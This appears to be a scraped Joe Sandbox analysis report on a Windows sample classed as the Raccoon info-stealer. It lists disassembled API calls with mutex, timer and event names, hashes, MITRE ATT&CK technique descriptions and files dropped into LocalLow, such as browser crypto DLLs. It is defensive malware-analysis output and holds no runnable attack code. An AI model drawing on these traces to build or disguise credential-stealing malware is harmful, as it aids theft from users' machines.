Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004076B4,?,?,?), ref: 00408008
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 00408047
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 00408099
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 004080A0
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 004080F5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 004080FC

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Create$TimerWaitable$Eventlstrlen$AllocCancelDebugEnvironmentErrorLastMutexOutputStringVariable$ChangeCloseFileFindMappingNotificationReleaseReset
String ID:
API String ID: 8252657-0
Opcode ID: 90f5b11da5f21da178971a336e4f26ee1b37b0aebb63ed8d5259f8b9c225750a
Instruction ID: e8c54be81e282ae7f25457206fc720eb92eefaefe2b21bcad783986bc7fb301b
Opcode Fuzzy Hash: 90f5b11da5f21da178971a336e4f26ee1b37b0aebb63ed8d5259f8b9c225750a
Instruction Fuzzy Hash: 10A16C71900609EBDB15DFA4DD84AEE7BB5FF8C300F008029FA15B7290DB75AD118BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDA5 Relevance: 7.6, APIs: 5, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000104,?,?,?,0040D73C,?), ref: 0040CE08
LocalFree.KERNEL32(00000000,?,?,?,0040D73C,?), ref: 0040CE24
wsprintfW.USER32 ref: 0040CE36

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

LocalFree.KERNEL32(00000000,?), ref: 0040CE4E
LocalFree.KERNEL32(00000000), ref: 0040CE55

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateLocal$FreeTimerWaitable$Event$CancelDebugEnvironmentErrorLastMutexOutputStringVariablelstrlen$AllocChangeCloseFileFindMappingNotificationQueryReleaseResetValuewsprintf
String ID:
API String ID: 2763504039-0
Opcode ID: 0f88148d1476d057c2cdab937a748dd859050557ec6cd02073f1f4caa9691acc
Instruction ID: 4dfc7a642496ed24b93a575f4bc6a8169dd78f7e3a9106d702aff18ed4a6e6be
Opcode Fuzzy Hash: 0f88148d1476d057c2cdab937a748dd859050557ec6cd02073f1f4caa9691acc
Instruction Fuzzy Hash: 49115B72200604FBD7109BE5EC89EEB7FB9FB8D750B108139F615E61A1DA749900DBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040929E Relevance: 6.4, APIs: 5, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
Part of subcall function 0040F788: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6

LocalFree.KERNEL32(00000000), ref: 00409347
LocalFree.KERNEL32(00000000), ref: 00409420
LocalFree.KERNEL32(00000000), ref: 0040942B
LocalFree.KERNEL32(00000000), ref: 00409437
LocalFree.KERNEL32(00000000), ref: 00409445

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$CreateFree$TimerWaitable$Event$CancelDebugEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseFileHandleMappingReset
String ID:
API String ID: 3658124133-0
Opcode ID: 42d4a8234d3b00a7d99a1c3399cea88d896a99ebe2fdb1fc0a0549c06da6815d
Instruction ID: f966f97e833fa7e95d570ddb0d8a32ecf7dc763458c9a7285bd4e56c5124389c
Opcode Fuzzy Hash: 42d4a8234d3b00a7d99a1c3399cea88d896a99ebe2fdb1fc0a0549c06da6815d
Instruction Fuzzy Hash: 92416D31600611EFCB159FA4EC89AEE3BB6FF89310B10C079F815A72A5DB749D01DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404A1F Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?), ref: 00404AA0
LocalAlloc.KERNEL32(00000040,00000000), ref: 00404ACD
LocalFree.KERNEL32(?), ref: 00404B37

Strings

kllprcss_, xrefs: 00404A2D

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc
String ID: kllprcss_
API String ID: 3098330729-4223651432
Opcode ID: e0ee10b87534bcdc131ceb373367628881f8964f35ef5686be86702fe863fe79
Instruction ID: ff817052db59b86f66376c57117c1d7670d43ab72fb360e44b2dc31570c87fba
Opcode Fuzzy Hash: e0ee10b87534bcdc131ceb373367628881f8964f35ef5686be86702fe863fe79
Instruction Fuzzy Hash: 4631C572A00601EBD710DBA9DC81FEE7BB5EBC8350B554579EA05B32D0DB38AD018A98

Uniqueness

Uniqueness Score: -1.00%

Function 00404994 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,?,0040ABEA,?), ref: 004049C8
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,0040ABEA,?), ref: 004049D5
LocalFree.KERNEL32(?), ref: 00404A06
LocalFree.KERNEL32(00000000), ref: 00404A11

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderFreeLocalPathSpecial
String ID:
API String ID: 1111715986-0
Opcode ID: 455925b83ff884e401dee865f49b1682429bd8eba2eb83eb4bf2c14b3daadbb7
Instruction ID: 620316d3a31ac79b5e94170ac89b2bd3bad36cdb92a62f6f4bd3c57a6056ab34
Opcode Fuzzy Hash: 455925b83ff884e401dee865f49b1682429bd8eba2eb83eb4bf2c14b3daadbb7
Instruction Fuzzy Hash: A7012D71741304FBE7109BE5DC86FEF3A68EB89764F108065F609AB2D2C6B49D0086A8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_5ebb57bd92d22f78fe98373a7ac393ea4d1fd2_e15faf63_4c96da8a-481f-4c37-9b32-0f3fff7b9979\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1262.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER14A5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER14C5.tmp.xml

C:\Users\user\AppData\LocalLow\freebl3.dll

C:\Users\user\AppData\LocalLow\mozglue.dll

C:\Users\user\AppData\LocalLow\msvcp140.dll

C:\Users\user\AppData\LocalLow\nss3.dll

C:\Users\user\AppData\LocalLow\softokn3.dll

C:\Users\user\AppData\LocalLow\sqlite3.dll

C:\Users\user\AppData\LocalLow\vcruntime140.dll

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe

Function 031E52E9 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Function 030410D8 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 556
COMMON

Function 030418E0 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Function 030418E8 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Function 03041750 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 03041828 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Function 03041830 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Function 00404B50 Relevance: 1398.7, APIs: 399, Strings: 399, Instructions: 2176
timesynchronizationregistryCOMMON

Function 00401000 Relevance: 392.5, APIs: 112, Strings: 112, Instructions: 451
libraryloaderCOMMON

Function 0040E48D Relevance: 177.1, APIs: 63, Strings: 38, Instructions: 302
timeregistrysynchronizationCOMMON

Function 0040ED79 Relevance: 129.7, APIs: 46, Strings: 28, Instructions: 215
timeregistrymemoryCOMMON